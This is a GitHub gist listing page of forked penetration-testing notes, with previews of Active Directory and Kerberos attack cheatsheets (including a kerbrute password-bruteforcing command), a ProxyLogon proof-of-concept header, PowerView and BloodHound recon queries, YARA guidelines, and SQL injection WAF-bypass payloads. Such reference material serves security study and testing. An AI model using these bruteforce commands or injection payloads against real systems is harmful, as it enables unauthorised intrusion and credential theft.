Skip to content

Instantly share code, notes, and snippets.

View cyberheartmi9's full-sized avatar
:octocat:
Breaking stuff

PikaChu cyberheartmi9

:octocat:
Breaking stuff
375 followers · 27 following
View GitHub Profile
@cyberheartmi9
cyberheartmi9 / Active Directory Attacks.md
Created February 27, 2021 22:11 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
@cyberheartmi9
cyberheartmi9 / PoC_proxyLogon.py
Created March 13, 2021 22:11 — forked from vavkamil/PoC_proxyLogon.py
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
@cyberheartmi9
cyberheartmi9 / kerberos_attacks_cheatsheet.md
Created March 21, 2021 12:05 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@cyberheartmi9
cyberheartmi9 / yara_performance_guidelines.md
Created January 3, 2022 21:24 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

This Gist has been transfered into a Github Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.4, October 2020, applies to all YARA versions higher than 3.7
@cyberheartmi9
cyberheartmi9 / PowerView-3.0-tricks.ps1
Created January 12, 2022 11:01 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@cyberheartmi9
cyberheartmi9 / red-teaming-bloodhound-cypher-queries.md
Created August 13, 2022 11:36 — forked from mgeeky/red-teaming-bloodhound-cypher-queries.md
(OBSOLETED - most recent version: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md ). A handy list of Cypher queries that I've used during AD assessments

(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )

  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
@cyberheartmi9
cyberheartmi9 / gist:c296202c4428b65173b870da8b53a386
Created January 7, 2024 18:51 — forked from tehseensagar/gist:d82931fa8427b3b8a8825714b5b113c4
SQLi WAF Bypass All Method
`-=[SQL injection Queries]=-
HOW TO SUCCESSFULLY INJECTING SQL INJECTION
[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5
+div+0
+div false
+Having+1=0+